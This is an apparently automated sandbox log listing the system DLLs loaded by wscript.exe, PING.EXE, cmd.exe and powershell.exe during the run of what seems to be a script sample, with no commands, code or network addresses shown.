Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
